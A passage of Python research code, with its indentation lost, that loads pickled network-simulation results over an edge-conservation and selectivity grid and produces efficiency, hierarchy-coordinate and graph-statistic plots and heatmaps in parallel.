if G.observed_observables['mean_eff_dist']: mean_eff_dist_diffs_flattened.append(G.mean_eff_dist)
if G.observed_observables['global_eff_dist_diff']: global_eff_dist_diffs_flattened.append(G.global_eff_dist_diff)
if G.observed_observables['ave_nbr']: ave_nbr_var_flattened.append(G.ave_nbr_var)
if G.observed_observables['degree_dist']: log_degree_dist_var_flattened.append(G.degree_dist)
if G.observed_observables['cluster_coeff']: ave_cluster_flattened.append(G.ave_cluster_coeff)
if G.observed_observables['shortest_path']: ave_shortest_path_flattened.append(G.ave_shortest_path)
if G.observed_observables['efficiency_coordinates']: efficiency_coordinates.append(G.efficiency_coordinates)
if G.observed_observables['hierarchy_coordinates']:
linear_threshold_hierarchy_coordinates.append(G.linear_threshold_hierarchy_coordinates)
exp_threshold_hierarchy_coordinates.append(G.exp_threshold_hierarchy_coordinates)
for __, __, files in os.walk(data_directory):
f = sorted(files) # Order preserved due to 0 padding.
assert len(f) == edge_conservation_range.size * selectivity_range.size, f"Not as many files as parameter combinations: \n num_files: {len(f)}, edge_conservation_range.size * selectivity_range.size {edge_conservation_range.size * selectivity_range.size}"
for edge_conservation_val in edge_conservation_range:
selectivity_range_iter = iter(range(selectivity_range.size))
for selectivity_val_index in selectivity_range_iter:
used_cores = 0
selectivity_vals_per_full_cpu = 0
processes = []
left_over_selectivity_values = selectivity_range.size - selectivity_val_index
if left_over_selectivity_values < cores_used: # To ensure that parallelization persists when there are fewer tasks than cores
while selectivity_vals_per_full_cpu < left_over_selectivity_values:
with open(Path(data_directory, f[run_counter]), 'rb') as data:
G = pickle.load(data)
data.close()
# all args must be given for Process runs.
if eff_dist:
p_1 = mp.Process(target=plot_eff_dist, args=(G, False, False, False, True, False, False, Path(eff_dist_path, f'{run_counter:03}_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_1.start()
processes.append(p_1)
used_cores += 1
if network_graphs:
if num_nodes > 20: # prints end graphs alone for larger node values.
p_2 = mp.Process(target=plot_single_network, args=(G, -1, True, 200, False, None, False, False, null_sim, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
else:
p_2 = mp.Process(target=plot_network, args=(G, True, 200, False, null_sim, False, False, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
processes.append(p_2)
used_cores += 1
if node_plots:
p_3 = mp.Process(target=plot_node_values, args=(G, 'all', False, False, Path(node_path, f'{run_counter:03}_node_values_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_3.start()
processes.append(p_3)
used_cores += 1
if ave_nbr or cluster_coeff or shortest_path:
nx_graphs = G.convert_history_to_list_of_nx_graphs()
if ave_nbr:
p_4 = mp.Process(target=plot_ave_neighbor_degree, args=(nx_graphs, 'in', 'in', False, False, False,
Path(neighbor_path,
f'{run_counter:03}_neighbor_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_4.start()
processes.append(p_4)
used_cores += 1
if cluster_coeff:
p_5 = mp.Process(target=plot_clustering_coefficients, args=(nx_graphs, False, False, False, False,
Path(cluster_coeff_path,
f'{run_counter:03}_cluster_coeffs_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_5.start()
processes.append(p_5)
used_cores += 1
if shortest_path:
p_6 = mp.Process(target=plot_shortest_path_length, args=(nx_graphs, False, False,
Path(shortest_paths_path,
f'{run_counter:03}_shortest_path_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_6.start()
processes.append(p_6)
used_cores += 1
if degree_dist:
p_7 = mp.Process(target=plot_degree_histogram, args=(G, False, -1, False, False,
Path(degree_dist_path,
f'{run_counter:03}_degree_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_7.start()
processes.append(p_7)
used_cores += 1
if edge_dist:
p_8 = mp.Process(target=plot_edge_histogram, args=(G, False, -1, False, False, Path(edge_dist_path, f'{run_counter:03}_edge_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_8.start()
processes.append(p_8)
used_cores += 1
if global_eff_dist:
p_9 = mp.Process(target=plot_eff_dist, args=(G, True, False, False, True, False, False, Path(all_to_all_eff_dist_path, f'{run_counter:03}_global_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_9.start()
processes.append(p_9)
used_cores += 1
run_counter += 1 # Also serves as file index
selectivity_vals_per_full_cpu += 1
if meta_plots:
meta_plot_data_compiler()
# debug_counter += 1
utility_funcs.consume(selectivity_range_iter, left_over_selectivity_values - 1) # -1 because the iteration forwards 1 step still proceeds directly after
else:
while selectivity_vals_per_full_cpu < cores_used:
with open(Path(data_directory, f[run_counter]), 'rb') as data:
G = pickle.load(data)
data.close()
if eff_dist:
p_1 = mp.Process(target=plot_eff_dist, args=(G, False, False, False, True, False, False, Path(eff_dist_path, f'{run_counter:03}_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_1.start()
processes.append(p_1)
used_cores += 1
if network_graphs:
if num_nodes > 20: # prints end graphs alone for larger node values.
p_2 = mp.Process(target=plot_single_network, args=(G, -1, True, 200, False, None, False, False, null_sim, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
else:
p_2 = mp.Process(target=plot_network, args=(G, True, 200, False, null_sim, False, False, Path(graph_path, f'{run_counter:03}_graph_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_2.start()
processes.append(p_2)
used_cores += 1
if node_plots:
p_3 = mp.Process(target=plot_node_values, args=(G, 'all', False, False, Path(node_path, f'{run_counter:03}_node_values_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_3.start()
processes.append(p_3)
used_cores += 1
if degree_dist:
p_7 = mp.Process(target=plot_degree_histogram, args=(G, False, -1, False, False,
Path(degree_dist_path,
f'{run_counter:03}_degree_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_7.start()
processes.append(p_7)
used_cores += 1
if edge_dist:
p_8 = mp.Process(target=plot_edge_histogram, args=(G, False, -1, False, False, Path(edge_dist_path, f'{run_counter:03}_edge_dist_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_8.start()
processes.append(p_8)
used_cores += 1
if global_eff_dist:
p_9 = mp.Process(target=plot_eff_dist, args=(G, True, False, False, True, False, False, Path(all_to_all_eff_dist_path, f'{run_counter:03}_global_eff_dist_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}'), source_reward, 1, False))
p_9.start()
processes.append(p_9)
used_cores += 1
if ave_nbr or cluster_coeff or shortest_path:
nx_graphs = G.convert_history_to_list_of_nx_graphs()
if ave_nbr:
p_4 = mp.Process(target=plot_ave_neighbor_degree, args=(nx_graphs, 'in', 'in', False, False, False,
Path(neighbor_path,
f'{run_counter:03}_neighbor_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_4.start()
processes.append(p_4)
used_cores += 1
if cluster_coeff:
p_5 = mp.Process(target=plot_clustering_coefficients, args=(nx_graphs, False, False, False, False,
Path(cluster_coeff_path,
f'{run_counter:03}_cluster_coeffs_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_5.start()
processes.append(p_5)
used_cores += 1
if shortest_path:
p_6 = mp.Process(target=plot_shortest_path_length, args=(nx_graphs, False, False,
Path(shortest_paths_path,
f'{run_counter:03}_shortest_path_plot_for_edge_conservation_{np.round(edge_conservation_val, 2)}_selectivity_{np.round(selectivity_range[selectivity_val_index + selectivity_vals_per_full_cpu], 2)}')))
p_6.start()
processes.append(p_6)
used_cores += 1
run_counter += 1 # Also serves as file index
selectivity_vals_per_full_cpu += 1
if meta_plots:
meta_plot_data_compiler()
# debug_counter += 1
utility_funcs.consume(selectivity_range_iter, cores_used - 1) # Advances skew iter cpu count iterations
for process in processes:
process.join() # join's created processes to run simultaneously.
if meta_plots:
ave_nbr_vars = np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
if np.argmin(ave_nbr_vars) < 0:
min_nbr_var = np.min([val > 0 for val in ave_nbr_vars])
ave_nbr_vars = [el if el > 0 else min_nbr_var for el in ave_nbr_vars]
color_map = [int(i*255/selectivity_range.size) for i in np.arange(selectivity_range.size, 0, -1)]*int(edge_conservation_range.size) # color scale by selectivity value reversed
edge_conservation_color_map = np.array([[int(i * 255 / edge_conservation_range.size)] * int(selectivity_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]).flatten() # color scale by edge conservation value reversed
plot_limits = [[-1, 1], [0, 1], [0, 1]]
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness",
zlabel="Orderability", color=color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds]'))
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness",
zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds_Colored_via_Edge_Conservation]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds_Colored_via_Edge_Conservation]'))
if efficiency_coordinates:
scaling = 2
cropped_diff_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 0], std_multiple_cutoff=2)
cropped_rout_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 1], std_multiple_cutoff=1)
diff_eff_std, diff_eff_mean = np.std(cropped_diff_eff), np.mean(cropped_diff_eff)
rout_eff_std, rout_eff_mean = np.std(cropped_rout_eff), np.mean(cropped_rout_eff)
x_eff_lim = [diff_eff_mean - (scaling * diff_eff_std), diff_eff_mean + (scaling * diff_eff_std)]
y_eff_lim = [rout_eff_mean - (scaling * rout_eff_std), rout_eff_mean + (scaling * rout_eff_std)]
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency",
title=Path(grid_search_plots_dir, 'Efficiency_Scores_wo_outliers'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=color_map, plot_limits=[[0, 2], [0, 2]], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_Around_1'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=color_map, fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores'))
# Efficiency Coordinates color coded via edge conservation value (darker means higher edge conservation)
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_wo_outliers_[Colored_by_Edge_Conservation]'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, plot_limits=[[0, 2], [0, 2]], fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_Around_1_[Colored_by_Edge_Conservation]'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency", color=edge_conservation_color_map, fig_title="Diffusion vs Routing Efficiency", title=Path(grid_search_plots_dir, 'Efficiency_Scores_[Colored_by_Edge_Conservation]'))
# Efficiency Heatmaps:
diffusion_efficiencies, routing_efficiencies = np.array(efficiency_coordinates)[:, 0], np.array(efficiency_coordinates)[:, 1]
plot_heatmap(np.array(diffusion_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'E_diff_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Diffusion Efficiency')
# plot_heatmap(np.array(np.log(diffusion_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'ln_E_diff_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, interp_method=interpolate, normalize=False, fig_title='Ln Diffusion Efficiency')
plot_heatmap(np.array(routing_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'E_rout_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Routing Efficiency')
# plot_heatmap(np.array(np.log(routing_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'ln_E_rout_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Routing Efficiency')
if global_eff_dist_diffs_flattened: plot_heatmap(np.array(global_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'global_eff_dist'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='All-to-All Effective Distance Differences')
if log_degree_dist_var_flattened: plot_heatmap(np.array(log_degree_dist_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'log_degree_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Final Degree Distribution Variance')
# if np.any(ave_nbr_vars): plot_heatmap(np.array(np.log(ave_nbr_vars).reshape(edge_conservation_range.size, selectivity_range.size)), title=Path(grid_search_plots_dir, 'log_ave_neighbor_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='log_ave_nbr_var')
if np.any(ave_nbr_vars): plot_heatmap(np.array(ave_nbr_vars).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'log_ave_neighbor_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='log_ave_nbr_var')
if np.any(ave_cluster_flattened): plot_heatmap(np.array(ave_cluster_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'ave_cluster_coefficient'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Average_Cluster_Coefficient')
if np.any(ave_shortest_path_flattened): plot_heatmap(np.array(ave_shortest_path_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'ave_shortest_path'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Average_Shortest_Path')
if not null_sim:
if eff_dist_diffs_flattened:
plot_heatmap(np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(grid_search_plots_dir, f'eff_dist_diffs'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Effective Distance Differences to Source')
if mean_eff_dist_diffs_flattened:
plot_heatmap(np.array(mean_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(grid_search_plots_dir, f'mean_eff_dist'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ave Effective Distance to Source')
print(f"Time lapsed for plotting {num_nodes} nodes, {run_counter} parameter combinations: {utility_funcs.time_lapsed_h_m_s(time.time()-start_time)}")
def grid_search_meta_plots(path_to_data_dir, edge_conservation_range, selectivity_range, output_dir=None, interpolate=None, null_sim=False, verbose=False):
"""
Creates meta plots for a given dataset (sub)directory, and puts the results in new appropriately named subdirectories.
:param path_to_data_dir: string; Path obj, path to data directory
:param edge_conservation_range: float; np.arange, full sequence of edge_conservation values
:param selectivity_range: float; np.arange, full sequence of selectivity values
:param num_nodes: int number of nodes used in simulation -> graph generation. (iterated over via shell command for node num grid-search)
:param output_dir: string, path obj: Output directory, defaults to data directory
:param verbose: Bool: if true, prints % completion and time lapsed at end.
"""
start_time = time.time()
if output_dir is None:
output_dir = path_to_data_dir
meta_grid_search_plots_dir = Path(output_dir, f'meta_plots')
try:
os.mkdir(meta_grid_search_plots_dir), f'Created folder for grid search results at {meta_grid_search_plots_dir}'
except OSError:
print(f'{meta_grid_search_plots_dir} already exists, adding or overwriting contents')
pass
if verbose: run_counter = 0
f = []
eff_dist_diffs_flattened = []
mean_eff_dist_flattened = []
global_eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
degree_dist_var_flattened = []
linear_threshold_hierarchy_coordinates = []
exp_threshold_hierarchy_coordinates = []
efficiency_coordinates = []
for __, __, files in os.walk(path_to_data_dir):
f = sorted(files) # Order preserved due to 0 padding.
assert len(f) == edge_conservation_range.size * selectivity_range.size, f"Not as many files as delta combinations: \n num_files: {len(f)}, edge_conservation_range.size * selectivity_range.size {edge_conservation_range.size * selectivity_range.size}"
for file in f:
with open(Path(path_to_data_dir, file), 'rb') as data:
G = pickle.load(data)
data.close()
if not null_sim:
if G.eff_dist_diff: eff_dist_diffs_flattened.append(G.eff_dist_diff)
if G.mean_eff_dist: mean_eff_dist_flattened.append(G.mean_eff_dist)
if G.global_eff_dist_diff: global_eff_dist_diffs_flattened.append(G.global_eff_dist_diff)
if G.ave_nbr_var: ave_nbr_var_flattened.append(G.ave_nbr_var)
if G.degree_dist: degree_dist_var_flattened.append(G.degree_dist)
if G.linear_threshold_hierarchy_coordinates: linear_threshold_hierarchy_coordinates.append(
G.linear_threshold_hierarchy_coordinates)
if G.exp_threshold_hierarchy_coordinates: exp_threshold_hierarchy_coordinates.append(
G.exp_threshold_hierarchy_coordinates)
if G.efficiency_coordinates: efficiency_coordinates.append(G.efficiency_coordinates)
if verbose:
num_nodes = G.num_nodes
run_counter += 1
utility_funcs.print_run_percentage(run_counter, len(f))
# ave_nbr_diffs = np.array(ave_neighbor_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
ave_nbr_vars = np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
if np.argmin(ave_nbr_vars) < 0:
ave_nbr_vars += np.abs(np.min(ave_nbr_vars))
min_nbr_var = np.min([val > 0 for val in ave_nbr_vars])
ave_nbr_vars = [el if el > 0 else min_nbr_var for el in ave_nbr_vars]
color_map = [int(i * 255 / selectivity_range.size) for i in np.arange(selectivity_range.size, 0, -1)] * int(edge_conservation_range.size) # color scale by selectivity value reversed
edge_conservation_color_map = np.array([[int(i * 255 / edge_conservation_range.size)] * int(selectivity_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]).flatten() # color scale by edge conservation value reversed
# color_map = [int(i*100/edge_conservation_range.size) for i in range(edge_conservation_range.size)]*int(selectivity_range.size) # color scale by edge conservation value
# color_map = [int(i*100/edge_conservation_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]*int(selectivity_range.size) # color scale by edge conservation value reversed
plot_limits = [[-1, 1], [0, 1], [0, 1]]
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness",
zlabel="Orderability", color=color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds]'))
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness",
zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits,
plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(meta_grid_search_plots_dir,
'Hierarchy_Coordinates_[Linear_Thresholds_Colored_via_Edge_Conservation]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=edge_conservation_color_map,
plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(meta_grid_search_plots_dir,
'Hierarchy_Coordinates_[Exponential_Thresholds_Colored_via_Edge_Conservation]'))
scaling = 2
cropped_diff_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 0], std_multiple_cutoff=2)
cropped_rout_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 1], std_multiple_cutoff=1)
diff_eff_std, diff_eff_mean = np.std(cropped_diff_eff), np.mean(cropped_diff_eff)
rout_eff_std, rout_eff_mean = np.std(cropped_rout_eff), np.mean(cropped_rout_eff)
x_eff_lim = [diff_eff_mean - (scaling * diff_eff_std), diff_eff_mean + (scaling * diff_eff_std)]
y_eff_lim = [rout_eff_mean - (scaling * rout_eff_std), rout_eff_mean + (scaling * rout_eff_std)]
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores_wo_outliers'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[[0, 1.5], [0, 1.5]], fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores_Around_1'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores'))
# Efficiency Heatmaps:
diffusion_efficiencies, routing_efficiencies = np.array(efficiency_coordinates)[:, 0], np.array(
efficiency_coordinates)[:, 1]
plot_heatmap(np.array(diffusion_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'E_diff_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Diffusion Efficiency')
plot_heatmap(np.array(np.log(diffusion_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'ln_E_diff_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Diffusion Efficiency')
plot_heatmap(np.array(routing_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'E_rout_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Routing Efficiency')
plot_heatmap(np.array(np.log(routing_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'ln_E_rout_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Routing Efficiency')
plot_heatmap(np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'eff_dist_diff_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Effective Distance Difference to Source')
plot_heatmap(np.array(mean_eff_dist_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'mean_eff_dist_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Average Effective Distance to Source')
plot_heatmap(np.array(global_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'global_eff_dist_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='All-to-All Effective Distance Differences')
plot_heatmap(np.array(degree_dist_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'degree_var_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Final Degree Distribution Variance')
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness", zlabel="Orderability", plot_projections=True, fig_title='Hierarchy Coordinates (Linear Thresholds)', title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness", zlabel="Orderability", plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)', title=Path(meta_grid_search_plots_dir, 'Exp_Thresholds_Hierarchy_Coordinates'))
if verbose: print(f"Time lapsed for {num_nodes} node, {run_counter} parameter combinations: {int((time.time()-start_time) / 60)} minutes, {np.round((time.time()-start_time) % 60, 2)} seconds")
def all_plots_from_super_data_dir(path_to_data_dir, edge_conservation_range, selectivity_range, output_dir=None):
"""
Function simply allows for all plots to be generated from data via specifying super directory,
e.g. if many different node numbers were tested, and the resultant data was all stored (in their own generated folders) in a super directory.
:param path_to_data_dir: path to data directory.
:param edge_conservation_range: float array; np.arange: full sequence of edge conservation (coupling) values
:param selectivity_range: float array; np.arange: full sequence of edge conservation (coupling) values
:param output_dir: string; path obj: out_put directory. Defaults to data_directory
"""
if output_dir is None:
output_dir = path_to_data_dir
sub_dirs = sorted([dirs[0] for dirs in os.walk(path_to_data_dir) if dirs[0] != str(path_to_data_dir)])
for sub_dir in sub_dirs:
node_nums = int(str(str(sub_dir).split('/')[-1]).split('_')[-1]) # takes the node number as the end number of the latest subdirectory
grid_search_meta_plots(Path(sub_dir), edge_conservation_range, selectivity_range, output_dir=output_dir)
# Grid-Search Observables: ------------------------------------------------------------------------------------------
def cluster_coeff_diff(data_dir, initial_graph=0, final_graph=-1, clustering_timestep=-1):
"""
Loads and evaluates the clustering coefficients of the last (clustering_) timestep of the (initial, final) data graph
and returns their difference.
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_clustering_coeff = nx.average_clustering(G_initial.convert_to_nx_graph(timestep=clustering_timestep), weight='weight')
final_clustering_coeff = nx.average_clustering(G_final.convert_to_nx_graph(timestep=clustering_timestep), weight='weight')
return final_clustering_coeff - initial_clustering_coeff
def shortest_path_diff(data_dir, initial_graph=0, final_graph=-1, shortest_path_at_timestep=-1):
"""
Loads and evaluates the average shortest path length of the last (shortest_path_at) timestep of the (initial, final)
data graph and takes their difference.
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
